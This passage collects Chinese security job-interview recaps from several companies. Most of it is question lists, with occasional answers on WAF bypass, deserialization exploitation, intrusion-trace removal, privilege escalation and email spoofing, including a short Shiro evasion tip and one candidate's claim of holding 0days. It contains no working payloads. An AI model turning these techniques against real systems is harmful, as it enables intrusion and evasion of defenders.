    1. 如果一个数据包非常大，几个G或者一个G，我们就考虑数据包是否进行了重传，然后查看数据包的重传数，打个比方就是刷新，如果短时间重传数非常多，就为机器操作，判定为攻击
7. 我们发现一个攻击（如平台登录后的sql注入）我们可以通过流量回溯装置抓取那个被登录用户的用户名和密码，登录平台后自己利用发现的payload进行尝试，看是否能注入成功
面试官：听说你还做过红队？是哪个项目，你在里面的职责是什么

我：介绍了一下我的项目经验，然后说我在红队的是突击手负责打点（我们当时孤军奋战没后援，也没擅长内网的选手）
面试官：说说你项目中的成果

我：….
面试官：说一下你在项目里遇到的问题

我：我们通过exp拿下了一个锐捷路由器的webshell，但是卡在了反弹shell上面，无法进行反弹
面试官：那说一下项目结束后你是否有思考过这个问题，是否咨询过他人，解决方式是什么？（我感觉真的非常重视思考和问题解决，非常重视项目的闭环）

我：我有问过也拿过锐捷路由器的朋友，然后我认为是数据库和网站分离开了，然后只能拿下来webshell权限
面试官：你如何快速准确的确定资产？

我：通过fofa，谷歌语法，钟馗之眼，一些的注册信息
面试官：fofa的语法是什么？
面试官：你如何在这些资产中快速的确定漏洞？

我：最快的就是扫描器先扫描一遍，然后进行信息搜集，针对性的攻击，或者我们通过fofa语法针对性的在资产表中搜集是否存在特殊的cms或者oa系统….
面试官:一般扫描都会封禁你，你会怎么办

我：我会第一就是使用ip池代理，要么就是使用5g
面试官：你这些信息搜集和攻击都是效率不是很高的，项目结束后你有没有思考解决方法呢

我：我有想过自己写一个程序，把代码池和一些信息搜集和特定的利用方法融合，但是没写出来（又一次感到代码不好的痛苦）
面试官：那你是否有了解过国家hvv红队的隐藏流量过防火墙的技术呢？

我：有了解过，但是这个我不太会，没有地方去学（有点尴尬）
面试官：你们在打点的时候有没有什么特殊的方法呢？

我：我们除了搜索特点的oa系统，还会搜集资产里的邮件系统，进行信息搜集登录邮件系统，搜集各种配置文件数据库文件登录网站后台，我们成功登录到两个网站后台，和一个邮件系统，也拿下了几个oa
面试官：你们这么针对特定oa，是因为有0day吗（笑）

我：我们队有这几个oa的0ady和半day
面试官：开发这边怎么样？能直接上手开发吗？

我：python还能自己开发几个小工具，java还是只能看懂（好尴尬我真不行，可能是学安全时间还不够长，本来想今年主攻代码的）
面试官：意思就是只能开发几个简单的扫描脚本对么（大家一定啊要好好学代码）

我：是（尴尬的笑），最近在学习使用pos3编写poc
面试官：你如果来实习你想进行哪方面的学习呢？

我：（我选择了一个偏向防御类的方向，因为我知道攻击类的我应该水平不够，我很有自知之明）然后就是一些询问能工作几个月，什么时候能到岗

综合下来我认为面试官认为我的不足就是，红队时的攻击和信息搜集效率不高需要改进，可能缺少一点项目的反思和解决思路

hr面

首先介绍一下你自己的经历？
你才大二该大三，你在学校是怎么自学安全的？
你是怎么接触安全的？
你现在的学习内容是什么？
近期的学习规划是什么？
你在大学中平时课程和安全的学习是怎么分配的？是否会冲突？

某四字大厂面试复盘

这个面试有许少的两个问答式文章，建议参考

一面链接：https://zhuanlan.zhihu.com/p/412934756

二面链接：https://zhuanlan.zhihu.com/p/413684879

一面

看你做java多一些，讲讲java内存马原理和利用
那你讲下如何查杀java内存马，工具和原理角度
冰蝎和哥斯拉了解吗，讲讲原理
你之前在其他公司实习做了些什么事情
有绕waf的实战经验吗，从各种漏洞的角度谈下
熟悉webshell免杀吗，讲下原理
做过其他免杀吗，比如结合cs和msfvenom的
谈谈fastjson反序列化原理和常见利用链吧
数据结构熟悉吗，谈谈红黑树原理
java的hashmap用到红黑树，讲下hashmap的原理
有没有流量分析的经验
谈谈代码审计经验
看你有些cnvd和cve，讲讲挖洞的过程
有打过知名的ctf吗，讲将经历
熟悉内网渗透，域控这些，说一下实战经历
谈谈java反序列化的cc链原理吧
看你重写过sqlmap，读过sqlmap源码吗
看你熟悉mysql，讲讲索引，存储结构等
讲讲mysql为什么要用b+树
看过mysql源码吗
分析过二进制漏洞吗
有没有用汇编写过东西
谈谈linux内核的漏洞
挖过缓冲区溢出漏洞吗
python的沙箱逃逸了解吗
python的flask模版注入讲讲
看你做过抽象语法树相关的项目，谈一谈
讲讲rasp的概念和原理
谈谈rasp的对抗
谈谈php和golang语言本身的安全问题
机器学习和算法相关懂嘛
看你尝试写过简单的操作系统，谈谈思路
你有什么要问我的吗

二面

讲讲你挖过印象最深的洞
讲讲你写过的安全工具，从出发点和原理层面谈谈
讲讲文件上传这里怎样绕WAF
SSRF的利用和绕WAF手段
谈谈MSSQL如果XPCMDSHELL不能用怎么拿SHELL
遇到没有回显的RCE怎么办
不使用SQLMAP的OS-SHELL，各种数据库怎么写SHELL
给你一个比较大的日志，应该如何分析
谈谈redis未授权会导致哪些问题
讲讲SYN FLOOD原理，防御，检测手段
讲讲UDP反射放大的原理，防御，检测手段
说一说自己的优势吧
你有什么要问我的吗

三面

Padding Oracle Attack讲讲
Fastjson反序列化原理以及1.2.47绕过的原理
除了readObject以外造成反序列化的函数有哪些
CC链中找你最熟悉的几条链讲一讲
Shiro550反序列化的原理及利用工具编写思路
Spring/Struts2的RCE中印象最深的讲一讲分析过程
sql注入绕WAF的方式尽可能多说
分块传输绕WAF的原理
文件上传绕WAF的方式都有哪些
讲讲你挖过这些CVE中印象最深的
你自己最大的优点和缺点是什么
未来你想做安全的哪一个领域
你学校成绩如何有挂科吗
你有什么要问我的吗

某四字大厂实习面试复盘

一面

自我介绍
数组和链表各自的优势和原因
操作系统层面解释进程和线程区别
线程和进程通信方式以及数据安全问题
多进程和多线程的选用场景以及原因
了解过哪些WAF说说原理
尽可能多地说下SQL注入绕WAF方式
FUZZ绕WAF的Payload长度通常是多少
写过哪些正则说说具体的场景
不查资料不能测试直接写ipv4的正则
Fastjson的反序列化原理
Java反射机制会导致怎样的安全问题
XSS和CSRF的相同点以及如何配合利用
CSRF_TOKEN的位置以及原理和绕过
尽可能多地说你所知道的HTTP头
Nmap常见扫描方式的原理以及NSE脚本原理
看到你有不少CNVD证书讲一讲挖洞过程
讲一讲你考过的证书都学到了些什么
看到你Github有不少项目讲讲
你觉得自己还有什么亮点吗
你有什么要问我的

二面

自我介绍
熟悉哪些Web漏洞讲讲
跨域的解决办法原理以及安全问题
Python多进程和多线程如何选择
Python的GIL锁本质上做了什么事情
Java的JVM为什么要有GCROOT
Java的JVM有哪些垃圾收集器
垃圾回收计数引用机制的缺点是什么
CSRF怎么拿到Cookie
如何判断一个网站是钓鱼网站
不同域名怎样通过CSRF拿Cookie
说一些常见的HTTP头以及作用
HTTP-Only本质上做了什么事情
平衡二叉树和二叉搜索树讲一下
SYN Flood攻击原理及解决方案
SYN 反向探测的原理是什么
TCP SYN Cookie的原理
ARP欺骗攻击原理及解决方案
UDP端口探测的有效方式是什么
Nmap的FIN扫描和空扫描是什么
三次握手的序列号变化说一下
Python的值类型和引用类型是哪些
Python的list和dict线程安全吗
讲一下你做过收获最大的一个项目
你有什么要问我的

三面

自我介绍
解释下CSRF
结合实际的例子说说SSRF
结合实际的例子讲讲RCE
为什么现在文件上传很少了
基于语义分析的WAF了解吗
讲一下你上一段实习做了什么
讲几个印象深刻的挖洞经历
讲一下你对未来的规划
有没有转正的意愿
你有什么要问我的

四面（HR）

面试的体验怎么样
谈人生理想
最早实习时间

某两字大厂面试复盘

一面

自我介绍
前两段实习做了些什么
中等难度的算法题
java的class文件结构
kafka的原理了解吗
fastjson反序列化原理
讲讲你研究最深入的领域

二面

排序处不能用预编译应该怎么防
从白盒黑盒两个角度讲下挖过的漏洞
ssrf的绕过和防御
讲讲fortity等代码审计工具原理
存储过程角度讲讲预编译的原理
csp是如何防御xss的
csrf为什么用token可以防御
给你一个项目讲下审计思路
内网相关的问题
讲下你挖过的逻辑漏洞
讲讲你用golang写过的东西
什么是安全

三面

讲下你自己写ysoserial的思路
确定sql注入漏洞后如何进一步利用
泛微OA的漏洞原理讲讲
新爆出的Confluence RCE讲讲
以前的实习中做了什么事
***原理以及实战中的绕过
红蓝对抗的流程讲讲

四面

java反序列化原理和工具
讲讲关于指纹识别的方式
shiro反序列化工具的原理
不用sqlmap情况下sql注入点如何找
讲讲你挖到的这几个cve
二进制方面有无了解

某安全公司-安全研究员

一面

讲讲你写的几个Burp插件原理
做过什么JavaWeb项目吗
CC1-7找熟悉的讲一下原理
Fastjson和Jackson反序列化原理讲讲
BCEL可以用其他类加载器吗
XStream反序列化讲讲
最基本的反序列化原理是什么
了解JEP290的原理吗
讲下RMI原理以及相关的漏洞
JdbcRowSetImpl如何触发的JNDI注入
CC链四个Transformer区别
讲下你挖过的CVE和CNVD
反序列化除了readObject还有什么触发点
讲下Spring相关的RCE原理
讲讲IIOP和T3反序列化原理
PHP等语言的反序列化讲讲

二面

做了几年安全
未来想做什么
讲讲实习期间做的事
工作地点要求

PingCAP 安全工程师

一面

CTF相关：

你给同学的授课内容
- 如实说
SQL注入如何判断数据库类型
- “sqlmap一把梭…”
- 手动注的话用version函数等
- 面试官在听完我的答案之后说了他的答案：一般采用撞函数的方法，xxx数据库的函数名是xxx，xxxx数据库的函数名是xxxxx，特定函数执行正确的话即可判断数据库类型，version广义上说说撞函数的一种
布尔盲注、时间盲注
- 忘记怎么答的了，面试官应该没有补充我的答案
印象中比较有价值的题
- 聊了一下去年的国赛SQL签到题，“网络原因，时间盲注不行…”
- 聊了一下职业杯的某题，特定的font导致报错看不到，最后用curl实现了报错注入
- 聊了一下职业杯的某题，利用注入直接执行了SQL命令修改了密码执行逻辑，而非传统的读写注入
接上一题的
```
font
```
，“平时用过Burp Suite吗，BP中会打印全部内容，为什么会看不见
```
font
```
呢”
- “用过，当时太懒了没开BP…curl了一下发现可以注就懒得开BP了”
一些BP的操作
- 忘了答了啥，应该没啥大问题
SSRF相关
- 简单聊了一下
如何理解逻辑层面的漏洞
- 聊着聊着跑题了，后面面试官提醒我，又重新编了一段（x）
- 大概意思就是“不该加的功能别乱加”，顺便提了一下log4shell的漏洞成因，“乱加功能”
XSS相关
- “打比赛用的不多，细节可能忘记了”

护网相关：

聊聊演习
如果让你给甲方企业做渗透测试，你的大概思路
- 主站扫描、CDN检测、口令探测、注入之类
- 在授权范围内攻击上游厂商，尝试获取甲方站点源代码，现场审计0day
- 在授权范围内攻击下游客户、旁站等，先进入内网再突破DMZ
- 面试官也给出了他的答案进行补充，具体是啥忘了…
介绍了很久的黄金票据和白银票据，准备提问…
- “金银票据听说过，但是具体使用细节不熟悉…没有实操过”
- 面试官给我科普了一下

项目相关：

邮件系统
- 大概聊了一下多线程编程，C与python
作品赛
- 背了一下摘要，讲了一下个人工作，区块链与libsnark
- 没有细问，但是也没有打断我，让我自己叨逼叨了半天
区块链与智能合约
- 聊了一下truffle、solidity，吐槽了一下solidity不好用
爬虫
- 聊了一下“乐学给爷爬”系统和知乎刷流量系统
- “初代项目，维护跑路，停止服务”
容器，介绍了很久的k8s，准备提问
- “暂时还不会，目前只用过docker-compose”，场面一度十分尴尬
- 虽然但是，面试官还是给我科普了一下k8s
可能还问到了一些二进制的问题，具体忘了
反问：工作时间，是否加班等
- “我们和国外公司比较像，周六周日、法定节假日一定不上班”
- “我们以结果为导向，上班时间没有强制要求，你愿意九点来也可以，愿意十点来也可以；愿意五点走也可以，愿意六点走也可以，公司没有强制要求；如果有需要，也可以远程办公”
- “正常情况下不加班，但是如果遇到突发事件可能需要应急响应，像log4shell这种级别的漏洞就得做应急”
- 聊到这里突然有点哽咽，如此遵守中国劳动法的公司，对标的却是外企，国内996的公司真的需要那么多人996吗…

总体而言，PingCAP是截至目前，我面试过的面试体验最好的公司，问题的问题很深入，涉及的面很广，但是不管我答的有多烂面试官都会听我讲完；并且能明显看到面试官在记录面试内容，在我讲完之后再针对性提问，而不是在我讲到一半直接打断我… PingCAP是今天最晚面试的公司，但是最早发出了二面邀请（大概一面过了三个小时就通知了）…可以感受到他们虽然不加班，但是效率还是挺高的。

二面

实打实面了一个小时，聊了很多很多方向，从项目经历到个人发展规划，还聊到了公司选择等，感觉收获挺大的。

自我介绍
- 简单背了一下简历（然后是针对简历的提问）

作品赛相关:

介绍这个系统
数据安全相关
聊了一下区块链的开发经历

区块链相关

智能合约的鉴权、公私密钥相关等
数字钱包的身份认证等
智能合约的开发遇到那些困难

作品赛相关:

这个系统和普通联邦学习系统有什么突出特点吗
- “挺鸡肋的…保证了安全性，但是牺牲了性能”（瞎说什么大实话）
聊了一下大型开源项目二次开发的经历与感悟

渗透相关:

介绍一下渗透经历
方便聊聊渗透思路吗
渗透过程中的感悟，防守方有哪些不足，作为进攻方主要利用了哪些方式进行渗透
- “利用防守方安全意识薄弱…正经的WAF打不穿，但是并不是所有的站点都有WAF”

Github相关

面试官看到了我的Github，里面有一些docker-compose的脚本，聊了一下项目
介绍一下上述项目的开发历程、设计初衷等
聊了很多云配置的内容
聊到了LNMP的系统搭建，dockerfile相关

CTF相关

介绍一下CTF相关学习、比赛、获奖等
介绍一下擅长领域

工作意向相关

“像你有CTF经历，简历也不错，应该能去很多公司，像长亭、腾讯云、深信服等，包括我们公司，你对未来的公司选择会有怎样的考虑”
- 直接点名长亭了，有点慌；内心OS：长亭的面试邮件到现在都没发，PingCAP搞快点把我收了…
- 说了一下自己的选择标准：优先选择“不加班”，然后选择可能可以落户的公司，最后比较薪资；
关于加班问题和面试官产生了一点分歧，“我可能要给你泼点冷水，我们也不是不加班，对于一个刚入职的新人，而且你还这么有目标，为了自己的理想肯定是要付出一定努力的…”
- 狡辩了一下，“我不是厌倦加班，我厌倦的是那种没有意义的加班…单纯的堆积工作时常其实没有太多意思”
- 然后提到了其他申请的公司，聊了一下对其他公司以及PingCAP的看法；没有踩一捧一的意思，就单纯的聊了一下对工作模式的看法
英语水平相关: 问了一下口语咋样，但是没有直接上英文，好像下一轮有英文
反问环节：问了一下面试流程，其他忘记了

二面居然秒过了（半小时以内吧），我这面试复盘害妹写完就给我发三面邮件了…呜呜呜我宣布PingCAP也是我的Dream Company之一

三面

项目主管面，总面试时间约50分钟，聊的内容挺多，体验也很不错。

自我介绍
介绍一下项目
SSRF相关
开发过的脚本、项目等
python相关：python是真正的多线程吗
挖过的漏洞
英语相关：用英文介绍一下XSS
英语相关：介绍不出来，介绍一下自己吧
平时安全相关的技术是怎样学习的呢
了解安全咨询的渠道等
实战相关
反问：主管介绍了工作内容、工作组等
反问：实习相关
主管点评：整体不错，渗透和开发这块需要加强，个人强项不够突出，可以多看看漏洞测试、漏洞公开等，尝试自己挖掘开源项目的漏洞

四面

大主管+HRBP面，一共面了约四十五分钟，大主管面了半小时，HRBP面了十五分钟左右。大主管主要是业务方向，对攻击手段问的不深，主要是防护与架构相关的问题，给我一种我是架构师的错觉（不是）

介绍一下你了解到的C/C++相关漏洞
- 聊了一下缓冲区溢出
- 聊了一下和其他业务嵌套时的漏洞
详细聊聊缓冲区溢出
- 栈溢出
- 堆溢出（不会）
- BSS溢出（不会）
缓冲区溢出如何避免
- 编译时避免
- 运行时避免
了解GO语言吗
- “暂时不了解”
“没有关系，那根据你的认识，你认为GO语言有哪些安全漏洞呢”
- “缓冲区溢出是不可避免的，只是利用难度的区别”
- 然后提了一下嵌套业务相关的漏洞
刚刚提到的其他漏洞如何避免
- 提到了SQL注入等
- “预编译，上WAF”
WAF相关，对于某些实体，比如本身就是一段SQL代码，如何防止误报
- 实体化，权限控制，纯代码直接实体化，使其没有执行权限
- 不能实体化的代码宁可误报也不放过…（瞎答的）
开放性问题，本公司的攻击面有哪些，应对策略有哪些
- 具体比较细节了，包括内部攻击外部攻击之类的
- 回答的比较泛，基于规则/行为/角色等，也对一些具体的服务说了些应对策略
数据安全相关，安全架构相关，如何保障数据安全等
- 零信任模型
- 最小权限原则
- 基于身份/角色的访问控制等
简历里面提到了容器，你对容器安全有了解吗”
- 瞎扯了点容器逃逸
- 平时接触容器主要是开发，容器安全接除不多”
剩下内容不记得了，大概问了半小时
反问：安全组的人员配置、团队规模等，以及这个凑够一桌麻将开office具体政策
- 安全团队其实都是remote work，基本上都不在北京…
- 开office的政策由HRBP解答的，确实有，也可以在南昌开，凑够人就行。

HRPB基本上没有涉及技术问题，中途聊了一下作品赛，可能是提到了数据安全，HRPB对这个比较感兴趣（x）

在北京吗
有无实习打算
是否为独生子女
有无考研打算
回应了一下刚刚开office的问题
还有没有其他公司的offer
对公司的选择是怎么样的
为什么觉得PingCAP是dream company
反问环节问了一下怎么不谈薪资…“下一轮会有专门的同学和你交流”

shopee

和信息安全相关的返回 response 头（https://www.cnblogs.com/yungyu16/p/13333909.html）
linux 常见命令
docker 常见命令
jwt 是什么
weblogic 反序列化原理（有一个 xml 反序列化漏洞还有后台文件上传还有二次 urldecode 权限绕过）
java 代码审计 exec 命令执行的相关利用前面拼了一段然后调用 lang.runtime.exec(“fuck” + a) 这里可以利用吗（不行因为根据 exec 的方法这里不能识别执行）
内存马相关原理
shiro 反序列化漏洞利用的时候由于 waf 过长被 ban 了怎么解决这个问题（如果是 waf 拦截可以尝试更换 http 头如果是 tomcat 头过长可以在 cookie 写一个 loader 然后 shellcode 写到 body 里）
内存马扫描原理如何检测内存马
java 代码审计反序列化原理(输入的恶意类被识别解析了)
ysoserial 原理 commoncollections 利用链的原理 (cc1 最后 invoke 反射加载输入的方法 cc2 cc3 等等大同小异)
linux 全盘查找文件命令(find / -name fucku)
docker run 的常用命令(docker run -it centos -p --name -d )
java 反序列化 php 反序列化 python 反序列化的区别和相同点(java 反序列化需要利用链 php反序列化也需要利用链 python反序列化不需要利用链有一个__reduce__可以自己构造命令执行)
linux 全盘搜索含有某个字符的文件/linux 全盘搜索叫某个名字的文件(grep -rl ‘abc’ /)(find -name / fucku)

shopee-红队-Singapore

linux 除了基本的内核提权还有什么别的方式可以进行提权
如何删除 linux 机器的入侵痕迹
寻找真实 ip 的快速有效的办法
print nightmare 漏洞利用&分析
java invoke 反射具体利用
域内常用命令
根据子网掩码探测指定资产
什么是无状态扫描
kerberos 原理
ntlm relay 原理
内网现在微软至今都没有修复一个漏洞，可以从普通的域用户提权到域管用户，用了 ntlm relay，你讲一下是什么漏洞
100 家单位，现在需要在一天时间内拿到所有单位的 ip，port，banner，怎么做，用什么东西来做
黄金票据原理，黄金票据在 kerberos 的哪个阶段？如何制作？用哪个用户的 hash 来制作？
cs 域前置的原理？流量是怎么通信的？从我直接执行一个命令，例如 whoami，然后到机器上，中间的流量是怎么走的？
java 反序列化原理

华为

log4j 如何绕过 trustcodebase
Springboot+shiro 环境如何进行渗透
实战中如何判断 fastjson 的版本
Fastjson 文件读写 gadget 是哪条，原理是什么
内存马类型，如何检测
给一个后台登录框有什么利用思路
Spring4shell 原理&检测&利用
安卓系统如何进行 rce，有什么思路
给一个移动端的 app，已知服务端是 cloud 环境，有什么思路利用

B站

k8s 和 docker 如何去做攻击有哪些利用方式是什么原因导致的
cs 的域前置和云函数如何去配置
内网攻击的时候内网有那些设备可以利用（hadoop kibana 之类的设备）
攻击 redis 不同的 linux 系统有什么不同
sql 注入的时候，如果遇到了返回的时候长度不够，怎么解决，如何截取，用什么函数截取
域前置
免杀

美团-安全岗实习

Q: 介绍下项目和专业技能 A: blah blah

Q: 说说你的反汇编器如何开发的 A: 当时学逆向所以想写一个，上网查 x86 指令格式后就开始写

Q: 反汇编器支持的 opcode 全吗 A: 一字节的比较全，两字节的不够全

Q: 做一个反汇编器，指令集 opcode 的意义去哪查 A: 厂商的手册，比如英特尔开发者手册，如果是代码虚拟机那种就自己逆向

Q: 怎么识别指令跳转条件和内存访问 A: （？没懂这个问题）是说指令 opcode 内部是怎么设计的吗

Q: （重新解释了一遍问题） A: （？？继续懵逼）不同的跳转条件对应不同的 opcode，也对应不同表项，反汇编器里内置了一个表，比如 0xaa 对应 jne，0xbb 对应 je（难道是想问 ModR/M, SIB 那些？

Q: （好像还是不满意于是跳过了上一个问题）那你觉得这个项目难点在哪 A: 一开始完全不懂 x86 指令格式，然后自己学习查资料实现了它（好了我知道没有难点

Q: 介绍下你开发的 Windows 沙箱 A: blah blah

Q: 这个重定向你做全了吗 A: 文件重定向比较全，注册表的写了一点没继续写

Q: 做一个沙箱，有什么需要重定向的 A: 文件，注册表，还有一些 IPC 对象比如管道

Q: 你做到什么程度 A: 文件比较全，注册表不全，进程隔离完全依赖于系统安全机制，IPC 对象没做（逐渐小声

Q: 说说你的研究生课题 A: blah blah

Q: 怎么增强模型健壮性的 A: blah blah

Q: 怎么看健壮性增强了 A: 增强前后各自攻击一下记录成功率，降低了就是增强了

Q: 训练学过的样本又拿去攻击，不会有问题吗 A: 训练集和测试集是分开的，对抗训练学的是训练集上的对抗样本

Q: 比赛是团体赛吗 A: 是

Q: 你负责什么 A: 逆向和少量 pwn

Q: 这个比赛的脱壳是什么壳，怎么脱的 A: nSPack，ESP 定律脱

Q: 有没有手动修复，还是工具直接脱 A: 没有，OEP 直接 dump（感觉事情不妙）

Q: 那我可以理解你这个脱壳就是工具点一下呗 A: ……是（呜呜

Q: ESP 定律原理知道吗 A: 一大堆废话，最后才转到堆栈平衡（反思一下应该先点出堆栈平衡再说废话emmm）

Q: 这场比赛你贡献了啥 A: 做了这道逆向队伍进了决赛，虽然是因为队里 Web 手没做出题而已

Q: 看了你的博客，做这些逆向 CTF 题，可能投入了足够时间大家都能会，下一步你要怎么做 A: （以为是问未来学习规划）一个是实战经验很缺乏，要加强，一个是明确方向，现在有点没方向

Q: （解释了一下他说的是人工分析有局限，要向自动化分析发展）知道自动化分析吗 A: 知道但没深入了解

Q: 你知道哪些自动化分析的例子 A: fuzzing，AEG，Unicorn

Q: 自己调试过真实漏洞吗 A: 无

Q: 研究生方向为什么不是安全 A: 导师选的

Q: 毕业想做安全还是研究生的方向 A: 安全

反问阶段 Q: 部门是基础研发吗 A: 我们主要做安全的一些基础研究，包括刚刚跟你说的自动化分析，还不是研发

Q: 能提些学习建议吗 A: 多实战，往自动化方向靠，深入了解操作系统的细节，重视正向开发

总结：找实习以来收到的第一次面试，没想到自己这么拉垮。本来就知道自己菜，一问三不知感觉更菜了，看得出面试官尽力找问题问我了，是我不争气凉得明明白白

美团-安全工程师实习

1.自我介绍

2.平时怎么学安全的

3.每天有多长时间学安全

4.SQL注入有哪些

5.给你一个URL，怎么判断注入

6.SQL注入防范

7.平时有看安全方面的文章吗，讲一篇

讲了一下昨晚看的DNSlog注入

8.讲一下CTF

9.讲一下你做过的渗透

最后你有什么要问的吗？

1.怎么学习安全

2.甲方和乙方的安全有什么不同

百度

一面

mysql注入，已知information.schema相关表在代码层中被过滤，不考虑绕过情况，还可以怎么查询表名或字段考虑sys数据库，一些被访问过的表会被存储信息，索引中存在的表等
mysql注入中基于报错注入的多种方式记得floor,updatexml，extractvalue三种，第一种主键重复，后面两种基于xpath语法解析错误
前端xss如果特殊字符输出被htmlscecial过滤了怎么办该函数默认只编码双引号，对单引号无效在js中可以利用\u003c等绕过符号过滤采用反引号执行命令，(可以采用jquery加载第三方js，或者添加script子节点引入js，或者直接获取cookie利用js访问第三方脚本) 编码转换，富文本，数据库输出输入场景都有可能失效，比如前端调用了html函数作为输出的情况
同源策略是啥，rerfer检测，前端空rerfer防御，怎么构造同源的标准是协议，端口，域名三者的统一，实质是浏览器对不允许的服务端返回的数据进行了拦截实现跨域有两种方式，jsonp和cors 服务端验证rerferer头(为空则不用rerferer头判断)，校验csrf token，在http头中自定义属性并验证
jsonp是什么，怎么绕过劫持问题，防御取决于服务端如何配置，绕过取决于服务端的配置，关键词绕过
sqlmap源码是否分析过。
tp漏洞复现
java反序列化rmi原理(简历上有写)，其他类型的反序列化是什么
如果让你编写一个DOM型xss扫描器，你该怎么写？假如事件需要点击，比如onclick去点击，该怎么检测这种类型的xss 返回结果，人工判断，或者利用windows事件触发
内网渗透流程和方式，比如域渗透
windows10上面的pth怎么利用
linux主机留后门的各种方式？计划任务，webshell，自启动后门，写注册表
DNS隧道搭建方式

二面

时长：53分钟

如何入门的经历
数据结构，算法，计网基础(非计科类专业自闭)
针对已有的项目深入提问(实现，拓展，创新)扫描器实现对比拓展(不晓得)
知识面深入，内网探测高危服务除了端口扫描还有啥？
漏洞挖掘的挑战性的事件的优秀亮点
其他公司面试情况
渗透方向能力目标，学习的新方向。
反问，有点考核提问智慧的意思，让我各种方面问他问题

三面

问了项目的思路和思考方式
挑战性的问题如何解决
聊了未来城市选择和发展路线
还有一些其他遇到某问题表现和思路是什么样的

和技术相关的问题占比很少

蚂蚁-安全工程师-实习

简历面

自我介绍一下
hw的项目做了什么负责什么角色
重保的项目做了什么负责什么角色
应急响应做过吗
内网渗透有了解吗然后问了关于内网渗透的东西
ctf有打过吗
逆向二进制有做过吗
反序列化php和java
你有什么想问我的吗

因为初面是简历评估的问题也不是很难就问了些项目延展了一点点就过去了

一面

自我介绍
hw项目
重保项目
src项目
src中你印象最深刻的一个漏洞
src中你碰到的困难以及如何克服的
log4j2
jndi注入
逆向二进制有了解吗
大学中学的最好的课
我们地点是在xx地有问题吗
有没有考研的想法
你有什么想问我的吗

一面属于在初面的基础上对项目更加深层次的挖了一下

二面

自我介绍一下
自我介绍完面试官说前面两次面试已经基本差不多技术方面的东西都问完了，我来问你点别的
然后问我对我这些src中挖到的漏洞的思考以及克服的困难和印象最深刻的漏洞
如果是我蚂蚁的业务支付宝你会怎么样去测试
有考研的打算吗
base地没问题吗
什么时候能来
你有什么想问我的吗

这二面的感觉就是更加注重你的发散思维以及对他业务的逻辑思考，因为我属于是src出身，所以这次面试正好对在我的口上了，所以对他业务的东西思考我就说了很多

hr面

hr面就是根据简历问你一些性格方面的东西

你项目中克服的困难

什么时候能来实习

意愿的地点是哪

为什么北方人不选择北京

蚂蚁-安全工程师-实习

一面

对什么方向比较兴趣，漏洞挖掘还是利用
有没有写过实际的利用exp（写过路由器的）
路由器那个exp能达到什么效果，能rce吗
这些知识是你课程上学习的还是自己打ctf学的
有没有用fuzz挖到过漏洞
读过英文的技术文献吗，有没有看一些英文的论文
有没有写过论文
愿意做偏研究的工作吗
数据库fuzz你有哪些改进思路
数据库的漏洞利用除了dos还能达到什么程度
你用的fuzz是python写的还是c写的
c开发能力怎么样
用的win本还是mac本
做过安卓的利用吗
有什么想问我的

二面

做一下自我介绍，把实习和项目都介绍一下
介绍一下rhg可以做到什么程度，能进行哪些漏洞利用，能绕过哪些保护措施
rhg参加的是什么比赛，是bctf吗
bctf参加过吗，有哪些有意思的题
对比一下qemu模式fuzz和源码模式fuzz
说说qemu模式的动态插桩怎么实现的，有什么优缺点
把你的实习展开说一下
fuzz普通程序和数据库有哪些不同点
论文里是怎么去解决数据库fuzz中的一些难点
你觉得作者的思路哪些是好的，哪些存在问题
你做的一些改动提升了什么，有比较好的效果吗，有没有挖出漏洞
看你的博客有用过afl++去挖漏洞，说说afl++和afl有哪些不同
你觉得afl++有哪些策略对你来说很有用
说说afl有哪些模块，每个模块的流程
afl-fuzz为什么速度很快
C++程序怎么去逆向找虚表

三面

自我介绍
介绍在深信服的工作
数据库fuzz和普通程序fuzz有什么不同
怎么给AFL做适配去fuzz数据库
介绍一下fuzz的流程，从选取目标开始
讲一下AFL的插桩原理
怎么选择fuzz测试点，感觉类似于fuzz单个API函数吧
Linux内核你了解哪部分，内存、网络、设备？
如果让你做内核的安全研究，你想从哪一块入手，为什么
有计划过怎么去夯实自己的基础吗
有没有工作上的规划，毕业后做哪方面研究
期望base哪里
什么时候可以来实习，实验室老师会限制实习时间吗
研三的时候可以实习吗

HR面

介绍一下本科和研究生的学习情况，为什么研究生选择换方向
印象深刻的比赛，负责哪方面工作，遇到过什么难点，你认为在队友会用哪些形容词形容你
了解部门工作内容吗，是你最想做的方向吗，希望base哪里

商汤科技-安全开发工程师

一面

20分钟+做题

问实习，问项目
基础问题：如何查看自己服务器某个端口情况：netstat lsof 如何查看远程服务器情况：telnet、nc、三次握手查看
两道题一个字符串全排列一个第一个不重复子串

说了一下安全开发是基本上全开发，推去了安全攻防

二面

安全攻防时长：55分钟

自我介绍
面试官介绍部门下面三个工作分组：
1. 入侵检测
2. 安全体系建设（SDL）
3. 红蓝对抗
反弹shell 如何检测？
如果攻击者使用了AWK、如何检测?
除了进程树的命令匹配，还有可以检测反弹shell的方法吗？
你了解哪一些提权手段？
细说一下什么是SUID提权
分别说说这几类提权的检测方法
如果让你设计一款入侵检测系统，你会往哪几方面考虑（发散思维）（文件、网络连接、进程）
进程隐藏技术是什么，如何检测？
log4j的原理
如果一个环境下存在有漏洞版本的log4j，如何在不升级的情况下做预防？
聊聊IAST
如果多进程下，A进程的Source 触发到了 B进程的sink点，如何溯源？
职业规划
反问

海康威视-网络安全工程师

一面

时长：45分钟

自我介绍
你认为海康威视哪些地方存在安全风险
iot漏洞挖掘有了解吗
云上攻防了解多少
数据上云有哪些风险
ssrf和csrf
openrasp看过源码吗
jndi如何做hook
高版本jndi如何绕过

算法：给一棵树，输出树每一层第一个和最后一个不为空节点中间的个数（中间可以为空）
    10
   /   \
  8     18
 / \      \
5   9       20     -----第三层节点数为4

    10
   /   \
  8     18
 / \    /
5   9  16         -----第三层节点数为3

很离谱，只有题目，没有输入输入样例也没有模版，只给10分钟，我说如果树是以数组的形式输入，可以得到树每层第一个和最后一个的边界，双指针遍历再坐标相减即可，面试官好像没认真听，草草结束了。

度小满-信息安全工程师

一面

时长：40分钟

sql注入原理，waf如何检测
ssrf csrf区别
邮件协议了解多少
smtp如何伪造？（搭建匿名邮件服务器、如果目标域名没有设置SPF Sender Policy Framework,就可以伪造）
入侵检测全流程
提权怎么检测
提权什么情况会出现误报？
容器内提权，怎么检测？
内网被搭了隧道，怎么检测？
流量加密了怎么检测？

二面

时长：30分钟

框架类漏洞挖掘思路、业务逻辑漏洞挖掘思路
反序列化漏洞如何检测
AES分类，默认密钥长度
AES加密流程
shiro爆破key，构建的初始序列化数据是什么？

小米-安全工程师

一面

时长：45分钟

